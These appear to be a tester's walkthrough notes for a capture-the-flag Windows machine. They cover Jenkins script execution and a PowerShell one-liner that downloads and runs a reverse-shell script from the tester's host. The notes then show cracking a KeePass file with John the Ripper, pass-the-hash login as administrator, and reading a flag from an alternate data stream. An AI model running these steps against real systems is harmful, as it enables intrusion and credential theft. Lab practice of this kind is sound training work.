2 :50000
===============================================================
2021/05/01 18:17:18 Starting gobuster in directory enumeration mode
===============================================================
/askjeeves (Status: 302) [Size: 0] [--> http://10.10.10.63:50000/askjeeves/]
http://10.10.10.63:50000/askjeeves/
shows a Jenkins dashboard
Created a new job > Windows Batch Command
powershell iex (New-Object System.Net.WebClient).DownloadString('http://10.2.74.151:8888/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress 10.2.74.151 -Port 6969
PS C:\Users\Administrator\.jenkins\workspace\revshell>whoami
jeeves\kohsuke
whoami /priv
Privilege Name Description State
============================= ========================================= ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
syteminfo
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.10586 N/A Build 10586
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00331-20304-47406-AA297
Original Install Date: 10/25/2017, 4:45:33 PM
System Boot Time: 5/2/2021, 2:23:20 AM
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
[idk why but eh why not; this is admin password on jekins]
C:\Users\Administrator\.jenkins\secrets> more initialAdminPassword
ccd3bc435b3c4f80bea8acca28aec491
Found CEH.kdbx file under Documents
$ keepass2john CEH.kdbx > ceh.hash
$ john --wordlist=/usr/share/wordlists/rockyou.txt --format=KeePass ceh.hash
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 6000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES, 1=TwoFish, 2=ChaCha]) is 0 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
moonshine1 (CEH)
1g 0:00:00:09 DONE (2021-05-01 19:32) 0.1051g/s 5780p/s 5780c/s 5780C/s nick18..moonshine1
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Found this under administrator
aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
$ pth-winexe -U Administrator%'aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00' //10.10.10.63 cmd.exe 1 ⨯
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
jeeves\administrator
dir /R can be used to see alternate data streams for the root.txt
powershell Get-Content -Path "hm.txt" -Stream "root.txt"
Last updated